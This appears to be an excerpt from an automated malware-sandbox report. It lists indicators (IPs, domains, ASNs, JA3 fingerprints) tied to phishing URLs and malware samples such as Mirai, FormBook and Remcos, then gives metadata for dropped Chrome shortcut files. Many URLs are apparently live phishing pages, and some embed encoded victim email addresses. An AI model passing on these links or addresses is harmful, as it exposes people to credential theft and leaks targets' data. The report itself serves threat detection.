38.34.185.163	https://java.owacaptcha.eu/java.html#dG9tQHZpcnR1YWxpbnRlbGxpZ2VuY2VicmllZmluZy5jb20=	Get hash	malicious	Unknown	Browse
	https://1uvb4gp37m-teamsharpoin2-sbs.translate.goog/?_x_tr_sch=http&_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-US&_x_tr_pto=wapp	Get hash	malicious	Unknown	Browse
	https://docmsghome.weebly.com/	Get hash	malicious	Unknown	Browse
	Diana.rivas-ZT8CS12DIW8UXMK-I-cast.html	Get hash	malicious	HTMLPhisher	Browse
	https://llrpatuwqd-red2moss-cfd.translate.goog/?_x_tr_sch=http&_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-US&_x_tr_pto=wapp	Get hash	malicious	Unknown	Browse
	https://indd.adobe.com/view/852997ab-ca29-4b2f-a289-d3d61178125d	Get hash	malicious	HTMLPhisher	Browse
	https://indd.adobe.com/view/852997ab-ca29-4b2f-a289-d3d61178125d	Get hash	malicious	HTMLPhisher	Browse
	https://82450-rdjsynijvh-sbs.translate.goog/?_x_tr_sch=http&_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp	Get hash	malicious	Unknown	Browse
	https://bafybeigzahjwy5wto2ltjasjdwsrmrfkpa7uettkpvdtipm7gszwhcr72y.ipfs.dweb.link/?filename=Dtydrtf.html	Get hash	malicious	HTMLPhisher	Browse
	https://8yvgbhn.weebly.com/?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-US&_x_tr_pto=wapp	Get hash	malicious	Unknown	Browse
18.239.36.13	https://pub-b40b96293407402c9de8f73f112f9089.r2.dev/do.html	Get hash	malicious	HTMLPhisher	Browse
	https://pub-b40b96293407402c9de8f73f112f9089.r2.dev/do.html	Get hash	malicious	HTMLPhisher	Browse
	https://litnet.com/out?signature=2c1f4fb3a510da55&verify=f0d85a74515d878f9714518b56f64f83c3d478981c8004fd8a36ff05f77ed04b&litnet=domain&url=https://cloudflare-ipfs.com/ipfs/QmbbUyKXzZMtLWL65JBbfeA8HRigpuDZ9sk5XT4xvfvyVx?filename=reqistrer-serversNonniiii.html#YXN0cmlkLnd1cnN0ZXJAaWxlZGVmcmFuY2UuZnI=	Get hash	malicious	HTMLPhisher	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ucarecdn.com	https://shop.ketochow.xyz/	Get hash	malicious	Unknown	Browse	2.19.122.221
	http://goofle.com	Get hash	malicious	Unknown	Browse	104.102.251.146
	https://www.landpage-preview.com/51b82e8d-f243-4317-9054-fa7b6c00d3d3	Get hash	malicious	HTMLPhisher	Browse	23.215.0.41
	https://ucarecdn.com/86a7c19c-ccdb-40f7-9325-6dcebacc649e/adobeCopy.html	Get hash	malicious	HTMLPhisher	Browse	23.55.243.206
	https://ucarecdn.com/fe27e530-60f0-4f85-94ca-457000c057e6/adobeCopy.html	Get hash	malicious	HTMLPhisher	Browse	184.50.26.67
	https://ucarecdn.com/fe27e530-60f0-4f85-94ca-457000c057e6/adobeCopy.html	Get hash	malicious	HTMLPhisher	Browse	184.28.98.107
	Possible SpamPourriel PossibleRE Gift from Canadian Tire.zip	Get hash	malicious	Phisher	Browse	23.40.179.27
	https://kontactr.com/form-page/349154dd127e5ef	Get hash	malicious	Unknown	Browse	23.207.202.173
	https://safestyle.com.au/pages/prescription-wholesale-assets	Get hash	malicious	HTMLPhisher	Browse	23.62.230.144
	https://hotmail-verification.zapier.app/	Get hash	malicious	Unknown	Browse	23.215.176.34
maxcdn.bootstrapcdn.com	https://www.google.ad/url?url=zbjhnstd&onm=38CRhu7&zhw=6mdOvlm&lqcbma=FQTzpTgPo&zivcs=5baqi3&saat=tUNMCswx&eaz=z97Pg4B&tve=jT9vt9P&mymwjw=eFOEvaPcr&euuqs=OU9Yyy&grap=6E6kGGKg&q=https://www.google.ad/amp/t9.myhosttest.blogsyte.com%2F2p988ybe&inn=RBXpolk&gve=rzPfe77&mbktnb=3wBSPFBgm&gghae=hkyo6k&wuim=N3czA7Bf&nxb=vmrT13r&bau=bHF0eT7&ftgwus=QGyzvGpWm&ktotr=7i9KAJ&wjos=kSjZhfQf	Get hash	malicious	Unknown	Browse	104.18.10.207
	http://pub-17d7828daac64fc3a83940a40d8b01d8.r2.dev/qwertyuiopBowa.html	Get hash	malicious	Outlook Phishing, HTMLPhisher	Browse	104.18.11.207
	http://dinhsuu1201.blogspot.ug/	Get hash	malicious	Unknown	Browse	104.18.10.207
	https://trades-kr-koreans-grizzly-amethyst-metatarsal-soucring.pages.dev/	Get hash	malicious	Unknown	Browse	104.18.11.207
	https://ipfs.io/ipfs/bafybeighp4krlvehs33pimsa3ka7aimkt3miqblm5arwkobl432i3aysgq/WeTransfer%20domain.html/	Get hash	malicious	HTMLPhisher	Browse	104.18.11.207
	https://ingresar-365-msn.glitch.me/	Get hash	malicious	Unknown	Browse	104.18.10.207
	https://newmarketofficecleaning.com	Get hash	malicious	Unknown	Browse	104.18.11.207
	http://mainalertss.com/landing/472c86f9-2929-4c42-ad7d-5a89e5f4928a	Get hash	malicious	Unknown	Browse	104.18.10.207
	http://www.zoomgroomlawton.com/cv/afc/#	Get hash	malicious	HTMLPhisher	Browse	104.18.10.207
	https://update-payment.web.app/	Get hash	malicious	HTMLPhisher	Browse	104.18.10.207
code.jquery.com.de	https://java.owacaptcha.eu/java.html#dG9tQHZpcnR1YWxpbnRlbGxpZ2VuY2VicmllZmluZy5jb20=	Get hash	malicious	Unknown	Browse	38.34.185.163
	https://1uvb4gp37m-teamsharpoin2-sbs.translate.goog/?_x_tr_sch=http&_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-US&_x_tr_pto=wapp	Get hash	malicious	Unknown	Browse	38.34.185.163
	https://docmsghome.weebly.com/	Get hash	malicious	Unknown	Browse	38.34.185.163
	https://llrpatuwqd-red2moss-cfd.translate.goog/?_x_tr_sch=http&_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-US&_x_tr_pto=wapp	Get hash	malicious	Unknown	Browse	38.34.185.163
	https://indd.adobe.com/view/852997ab-ca29-4b2f-a289-d3d61178125d	Get hash	malicious	HTMLPhisher	Browse	38.34.185.163
	https://indd.adobe.com/view/852997ab-ca29-4b2f-a289-d3d61178125d	Get hash	malicious	HTMLPhisher	Browse	38.34.185.163
	https://82450-rdjsynijvh-sbs.translate.goog/?_x_tr_sch=http&_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp	Get hash	malicious	Unknown	Browse	38.34.185.163
	https://bafybeigzahjwy5wto2ltjasjdwsrmrfkpa7uettkpvdtipm7gszwhcr72y.ipfs.dweb.link/?filename=Dtydrtf.html	Get hash	malicious	HTMLPhisher	Browse	38.34.185.163
	https://8yvgbhn.weebly.com/?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-US&_x_tr_pto=wapp	Get hash	malicious	Unknown	Browse	38.34.185.163
	https://11261-rd49023-cfd.translate.goog/?_x_tr_sch=http&_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-US&_x_tr_pto=wapp	Get hash	malicious	Unknown	Browse	38.34.185.163
d26p066pn2w0s0.cloudfront.net	https://pub-a96658bd73b04ce08bc20c06c724567d.r2.dev/1.html	Get hash	malicious	HTMLPhisher	Browse	3.165.113.95
	https://pub-7fafc0edaff149aeb15988fcb49541f4.r2.dev/Gate.html#data-protection@fms-logistics.com	Get hash	malicious	HTMLPhisher	Browse	18.239.36.8
	http://pub-20346a63221f4f17b0dfd4183beda90b.r2.dev/5.html	Get hash	malicious	HTMLPhisher	Browse	18.239.36.50
	PDF_ACH on EOC_file.htm	Get hash	malicious	Unknown	Browse	13.32.27.14
	https://pub-b40b96293407402c9de8f73f112f9089.r2.dev/do.html	Get hash	malicious	HTMLPhisher	Browse	18.239.36.13
	https://googleweblight.com/i?u=https://hizoom.co.uk/wp-admin/js/hereme/46343/8473r/YXN0cmlkLnd1cnN0ZXJAaWxlZGVmcmFuY2UuZnI=&domain=iledefrance.fr	Get hash	malicious	HTMLPhisher	Browse	13.32.27.129
	https://hizoom.co.uk/wp-admin/js/hereme/46343/8473r/YXN0cmlkLnd1cnN0ZXJAaWxlZGVmcmFuY2UuZnI=	Get hash	malicious	HTMLPhisher	Browse	18.239.36.8
	https://www.bing.com/ck/a?!&&p=e88a03182f37723cJmltdHM9MTcxNjQyMjQwMCZpZ3VpZD0wYjc5NmE1ZS1iM2ViLTY0YzktMGZiZi03ZTI1YjJlMzY1YjMmaW5zaWQ9NTE3NQ&ptn=3&ver=2&hsh=3&fclid=0b796a5e-b3eb-64c9-0fbf-7e25b2e365b3&psq=site%3atopnewsz66.com&u=a1aHR0cHM6Ly90b3BuZXdzejY2LmNvbS9tb3RoZXItYWJhbmRvbnMtb25lLW1vbnRoLW9sZC1kYXVnaHRlci10aGVuLWRhZC1wb3N0cy1hLWxldHRlci10by1oZXItb24tZmFjZWJvb2sv#cmVteS5jYXJkaW5ldEBkZ3RyZXNvci5nb3V2LmZy	Get hash	malicious	Unknown	Browse	3.165.113.95
	https://pub-b40b96293407402c9de8f73f112f9089.r2.dev/do.html	Get hash	malicious	HTMLPhisher	Browse	18.239.36.50
	https://pub-b40b96293407402c9de8f73f112f9089.r2.dev/do.html	Get hash	malicious	HTMLPhisher	Browse	18.239.36.13

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-02US	ACH Receipt.html	Get hash	malicious	HTMLPhisher	Browse	18.239.83.16
	https://docs.google.com/drawings/d/1qLrBv5e6nFXfFVtMDNkicLQy_velV_hePF-fb4qRTSc/preview	Get hash	malicious	Unknown	Browse	13.33.187.51
	Minecraft.exe	Get hash	malicious	Unknown	Browse	3.67.112.102
	https://api.virtru.com/accounts/email-activation?linkId=6a354426-d14b-461c-9068-d631a3772906-99eaadf1-1535-4926-b117-94d72b1cdf72&loginRedirectUrl=https://jpmchase.secure.virtru.com/secure-reader&userId=supplies@stinsons.com&senderEmail=noreplies.sua@jpmchase.com&c=E,1,GJLSrPtvth0tvKAsk9Y8SirlbwhoEVEruSrOswYM_LloAIiVFwyhuRHy64qpEnuVb816Gf3-lgJ8eHDKwE1BYzbKlN_iUmGn6C8RtrX3Te-ZHW3l4Q,,&typo=1	Get hash	malicious	Unknown	Browse	18.239.18.99
	https://www.microsoft.com/	Get hash	malicious	Unknown	Browse	3.71.149.231
	https://2427d52a0d5f43aeb8ec48218429eea6.svc.dynamics.com/t/t/RhDCX7DMdN7vx2xhSq5nifwg0aN9xMqPpvUwLKlEZh4x/bMjufjcxDQ5arMc4VkLwg5j24bc7y3FXw6cisbH5HmYx	Get hash	malicious	Unknown	Browse	3.165.206.67
	https://clt1666060.benchurl.com/c/l?u=11389B57&e=183DD76&c=196C0C&t=0&l=10048E56F&email=el21woga%2BaLG8Egi96a/g0i3U1RZs%2BtTHdp/xSXKtC4In/BhtGcY/Q%3D%3D&seq=1	Get hash	malicious	Unknown	Browse	50.112.168.142
	http://www.abc-arbitrage.com	Get hash	malicious	Unknown	Browse	18.239.50.46
	PO 34356 MIAALBE06052024-0903.html	Get hash	malicious	HTMLPhisher	Browse	13.225.78.47
	https://www.google.at/amp/s/lojabelezaecuidado.com.br/58176183nMABI3529xaNs-cGZvdXJuaWVyQG5vcmF1dG8uY29t-e=Dialoog58176183nMABI3529xaNs&id=496DEE149D8D483A879A48839FC5D1C3	Get hash	malicious	Unknown	Browse	3.165.136.43
AKAMAI-ASN1EU	Invoice.docm	Get hash	malicious	Unknown	Browse	104.124.11.186
	http://flexilink.com.ar/oo/docusign.php	Get hash	malicious	Unknown	Browse	2.16.164.91
	MSTeamsSetup_c_l_.exe	Get hash	malicious	Unknown	Browse	2.16.164.105
	TMSSetup.exe	Get hash	malicious	Unknown	Browse	2.16.164.27
	MSTeamsSetup_c_l_.exe	Get hash	malicious	Unknown	Browse	2.16.164.105
	original.eml	Get hash	malicious	HTMLPhisher	Browse	2.16.164.83
	https://youtube.com	Get hash	malicious	HTMLPhisher	Browse	172.233.128.220
	ELECTRONIC RECEIPT_bpost.be.html	Get hash	malicious	HTMLPhisher	Browse	23.43.60.225
	SecuriteInfo.com.Exploit.ShellCode.69.9963.10369.rtf	Get hash	malicious	Remcos	Browse	172.235.39.109
	https://peritiapartners-my.sharepoint.com/:w:/p/suzie_gragg/EXk3P0Z7Bk5Kq22jVu-9OpIBkQUCMcCPBJK_92JTtq2RaA?e=reITRK	Get hash	malicious	Unknown	Browse	23.43.61.160
COGENT-174US	HSBC Bank_Approvel Letter.exe	Get hash	malicious	FormBook	Browse	38.47.232.185
	KMtvig5fAT.elf	Get hash	malicious	Mirai	Browse	38.195.9.85
	Zmtl2jXJ68.elf	Get hash	malicious	Mirai	Browse	154.31.65.177
	i82HF8QQwf.elf	Get hash	malicious	Mirai	Browse	38.176.106.73
	98790ytt.exe	Get hash	malicious	FormBook	Browse	38.6.177.47
	CFEMail2000394003900390302.pdf	Get hash	malicious	Unknown	Browse	38.60.224.167
	BwuomGG1ev.elf	Get hash	malicious	Mirai	Browse	38.72.55.205
	z3M3x8coia.elf	Get hash	malicious	Unknown	Browse	38.227.184.130
	2m4NTxUB6E.elf	Get hash	malicious	Mirai	Browse	38.10.97.92
	7Svqj8bnJR.exe	Get hash	malicious	GhostRat, Mimikatz	Browse	206.238.43.201
AMAZON-02US	https://airtable.com/appLxB5sOmdo2GJo9/shrh1CoBQsbhadVcV	Get hash	malicious	HTMLPhisher	Browse	108.138.7.28
	ACH Receipt.html	Get hash	malicious	HTMLPhisher	Browse	18.239.83.16
	https://docs.google.com/drawings/d/1qLrBv5e6nFXfFVtMDNkicLQy_velV_hePF-fb4qRTSc/preview	Get hash	malicious	Unknown	Browse	13.33.187.51
	Minecraft.exe	Get hash	malicious	Unknown	Browse	3.67.112.102
	https://api.virtru.com/accounts/email-activation?linkId=6a354426-d14b-461c-9068-d631a3772906-99eaadf1-1535-4926-b117-94d72b1cdf72&loginRedirectUrl=https://jpmchase.secure.virtru.com/secure-reader&userId=supplies@stinsons.com&senderEmail=noreplies.sua@jpmchase.com&c=E,1,GJLSrPtvth0tvKAsk9Y8SirlbwhoEVEruSrOswYM_LloAIiVFwyhuRHy64qpEnuVb816Gf3-lgJ8eHDKwE1BYzbKlN_iUmGn6C8RtrX3Te-ZHW3l4Q,,&typo=1	Get hash	malicious	Unknown	Browse	18.239.18.99
	https://www.microsoft.com/	Get hash	malicious	Unknown	Browse	3.71.149.231
	https://2427d52a0d5f43aeb8ec48218429eea6.svc.dynamics.com/t/t/RhDCX7DMdN7vx2xhSq5nifwg0aN9xMqPpvUwLKlEZh4x/bMjufjcxDQ5arMc4VkLwg5j24bc7y3FXw6cisbH5HmYx	Get hash	malicious	Unknown	Browse	3.165.206.67
	https://clt1666060.benchurl.com/c/l?u=11389B57&e=183DD76&c=196C0C&t=0&l=10048E56F&email=el21woga%2BaLG8Egi96a/g0i3U1RZs%2BtTHdp/xSXKtC4In/BhtGcY/Q%3D%3D&seq=1	Get hash	malicious	Unknown	Browse	50.112.168.142
	http://www.abc-arbitrage.com	Get hash	malicious	Unknown	Browse	18.239.50.46
	PO 34356 MIAALBE06052024-0903.html	Get hash	malicious	HTMLPhisher	Browse	13.225.78.47
CLOUDFLARENETUS	https://airtable.com/appLxB5sOmdo2GJo9/shrh1CoBQsbhadVcV	Get hash	malicious	HTMLPhisher	Browse	172.64.155.119
	OFS Fitel, LLC In-Service Agreement.doc	Get hash	malicious	Unknown	Browse	104.18.2.35
	ACH Receipt.html	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	https://docs.google.com/drawings/d/1qLrBv5e6nFXfFVtMDNkicLQy_velV_hePF-fb4qRTSc/preview	Get hash	malicious	Unknown	Browse	1.1.1.1
	http://www.absoluteperfection.co.uk	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://link.mail.beehiiv.com/ss/c/u001.7fHwObg5vVyVWvL0XjuYab-fyGtR7ObT67BDVhUgvAxP6uAUVbKK3L1COuezszwXayDkz260QMkrdPC1htw3t_5QRxG8W1etpOoCjxpnTJGXzPf3j8BuqczIRafVz2-o3qRunciZcXpCaqRfMg3DrXAbIXYJXtcwpFCWMwkPsBA/477/gYfATSQUQlWduKXI1eEKgQ/h6/h001.s5I972gJe9AXwSBmdFGe7q9GgXfXPDzuKhKqj7sTfRo	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://link.mail.beehiiv.com/ss/c/u001.7fHwObg5vVyVWvL0XjuYab-fyGtR7ObT67BDVhUgvAxP6uAUVbKK3L1COuezszwXayDkz260QMkrdPC1htw3t_5QRxG8W1etpOoCjxpnTJGXzPf3j8BuqczIRafVz2-o3qRunciZcXpCaqRfMg3DrXAbIXYJXtcwpFCWMwkPsBA/477/gYfATSQUQlWduKXI1eEKgQ/h6/h001.s5I972gJe9AXwSBmdFGe7q9GgXfXPDzuKhKqj7sTfRo	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://api.virtru.com/accounts/email-activation?linkId=6a354426-d14b-461c-9068-d631a3772906-99eaadf1-1535-4926-b117-94d72b1cdf72&loginRedirectUrl=https://jpmchase.secure.virtru.com/secure-reader&userId=supplies@stinsons.com&senderEmail=noreplies.sua@jpmchase.com&c=E,1,GJLSrPtvth0tvKAsk9Y8SirlbwhoEVEruSrOswYM_LloAIiVFwyhuRHy64qpEnuVb816Gf3-lgJ8eHDKwE1BYzbKlN_iUmGn6C8RtrX3Te-ZHW3l4Q,,&typo=1	Get hash	malicious	Unknown	Browse	104.16.117.116
	https://www.microsoft.com/	Get hash	malicious	Unknown	Browse	172.64.151.101
	https://2427d52a0d5f43aeb8ec48218429eea6.svc.dynamics.com/t/t/RhDCX7DMdN7vx2xhSq5nifwg0aN9xMqPpvUwLKlEZh4x/bMjufjcxDQ5arMc4VkLwg5j24bc7y3FXw6cisbH5HmYx	Get hash	malicious	Unknown	Browse	104.17.24.14

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	OFS Fitel, LLC In-Service Agreement.doc	Get hash	malicious	Unknown	Browse	184.28.90.27 40.68.123.157 173.222.162.55 20.114.59.183
	ACH Receipt.html	Get hash	malicious	HTMLPhisher	Browse	184.28.90.27 40.68.123.157 173.222.162.55 20.114.59.183
	http://www.absoluteperfection.co.uk	Get hash	malicious	Unknown	Browse	184.28.90.27 40.68.123.157 173.222.162.55 20.114.59.183
	https://api.virtru.com/accounts/email-activation?linkId=6a354426-d14b-461c-9068-d631a3772906-99eaadf1-1535-4926-b117-94d72b1cdf72&loginRedirectUrl=https://jpmchase.secure.virtru.com/secure-reader&userId=supplies@stinsons.com&senderEmail=noreplies.sua@jpmchase.com&c=E,1,GJLSrPtvth0tvKAsk9Y8SirlbwhoEVEruSrOswYM_LloAIiVFwyhuRHy64qpEnuVb816Gf3-lgJ8eHDKwE1BYzbKlN_iUmGn6C8RtrX3Te-ZHW3l4Q,,&typo=1	Get hash	malicious	Unknown	Browse	184.28.90.27 40.68.123.157 173.222.162.55 20.114.59.183
	https://www.microsoft.com/	Get hash	malicious	Unknown	Browse	184.28.90.27 40.68.123.157 173.222.162.55 20.114.59.183
	https://docs.google.com/forms/d/e/1FAIpQLSf-odKEE82LEOujINKAwbtXy190-Zzj1nnrlcpbdgq3dZ28zg/viewform?usp=pp_url	Get hash	malicious	Unknown	Browse	184.28.90.27 40.68.123.157 173.222.162.55 20.114.59.183
	https://2427d52a0d5f43aeb8ec48218429eea6.svc.dynamics.com/t/t/RhDCX7DMdN7vx2xhSq5nifwg0aN9xMqPpvUwLKlEZh4x/bMjufjcxDQ5arMc4VkLwg5j24bc7y3FXw6cisbH5HmYx	Get hash	malicious	Unknown	Browse	184.28.90.27 40.68.123.157 173.222.162.55 20.114.59.183
	http://www.abc-arbitrage.com	Get hash	malicious	Unknown	Browse	184.28.90.27 40.68.123.157 173.222.162.55 20.114.59.183
	PO 34356 MIAALBE06052024-0903.html	Get hash	malicious	HTMLPhisher	Browse	184.28.90.27 40.68.123.157 173.222.162.55 20.114.59.183
	http://shbskjh.cfd	Get hash	malicious	Unknown	Browse	184.28.90.27 40.68.123.157 173.222.162.55 20.114.59.183

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jun 20 15:14:11 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2673
Entropy (8bit):	3.9878626773246824
Encrypted:	false
SSDEEP:	48:8y/kbdxsTwBHZidAKZdA1uehwiZUklqeh3y+3:8y/t0qYy
MD5:	28C83F3A5A8FB378C78D4B1109C8EE4F
SHA1:	D3A170E778AE26F055F8E09AD624BBE9214A92EB
SHA-256:	4D85A17A314EAB918190D2E519DB009A7177E149F5BC7D17F83C4362A6BE9596
SHA-512:	559ED0EA2179A9F4B6134E4259E01914D755E4B30B00201AC6D3E0F3F8338E9285653A138ED00BDE8C2FB6C7A39D55D7FF074C9CDE0D3CA618BB2B2041111861
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,....Mm..,.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW$O..PROGRA~1..t......O.I.X.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.L..Chrome..>......CW.V.X.....M......................k..C.h.r.o.m.e.....`.1.....EW.L..APPLIC~1..H......CW.V.X............................k..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.X.....N.......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........X.F^.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jun 20 15:14:11 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2675
Entropy (8bit):	4.00531863768663
Encrypted:	false
SSDEEP:	48:8rkbdxsTwBHZidAKZdA1Heh/iZUkAQkqehIy+2:8rt009Qly
MD5:	64074A800DCFF10C56B952B480D5A454
SHA1:	21D9A3477E15668DB9068314CBAEF9CBDEFF00BF
SHA-256:	0584B0D672B434D0D4FFCBB8E3484BB353FB0C48DFACCDCDE75C66A0C04A227B
SHA-512:	B8352FCA6159C5870B64F3096EED2A39CDD233524A96A1920086EA66A767987C40257A25D3787EFF9F6CC52C98652EC326C616C01A389FFCA63ED8C3C0FEDEB2
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,....1...,.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW$O..PROGRA~1..t......O.I.X.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.L..Chrome..>......CW.V.X.....M......................k..C.h.r.o.m.e.....`.1.....EW.L..APPLIC~1..H......CW.V.X............................k..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.X.....N.......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........X.F^.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 5 08:59:33 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2689
Entropy (8bit):	4.010362115497173
Encrypted:	false
SSDEEP:	48:8FkbdxsTwbHZidAKZdA149eh7sFiZUkmgqeh7sWy+BX:8Ft0GnEy
MD5:	BE2DDCAE2236199218DEC56C11199622
SHA1:	01CA917956BFFCD9D4F936ECFBB02EB8A52D3EEA
SHA-256:	CC2A5242940EE5697F12AC73A009E8C85CBF8EB27856CF42D92E37ED0B331F5A
SHA-512:	455785ADACBFDF2F70EA64BB57F60E43E1F2EC292B4E2079D673A210CB68BA43CE8CFE20CF67B30FD27166FBE025FE6C1EB2425BF0F6E1564F79CFD209618EDA
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,....K..r.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW$O..PROGRA~1..t......O.I.X.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.L..Chrome..>......CW.V.X.....M......................k..C.h.r.o.m.e.....`.1.....EW.L..APPLIC~1..H......CW.V.X............................k..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VEW.L....N.......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........X.F^.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jun 20 15:14:11 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	4.001861280768705
Encrypted:	false
SSDEEP:	48:8TkbdxsTwBHZidAKZdA14ehDiZUkwqeh8y+R:8Tt0vuy
MD5:	A9770D2625E609994998880237A7069C
SHA1:	21999260BE4B5C21B3B463AB5C363DC63B99F35B
SHA-256:	69018017C59D8D43A23376A6012C18A594B6DD17A48A75A6C2A583C280044F99
SHA-512:	6E8957D5B499A2F580D9046D48950EE5B3F91E916EF1D188690CAAD349CE3C9CAE810D69896A780DA407C9C55172B49B0C0141D311CBDBFF3AC18B287EF6A967
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,....F..,.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW$O..PROGRA~1..t......O.I.X.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.L..Chrome..>......CW.V.X.....M......................k..C.h.r.o.m.e.....`.1.....EW.L..APPLIC~1..H......CW.V.X............................k..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.X.....N.......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........X.F^.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e..C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

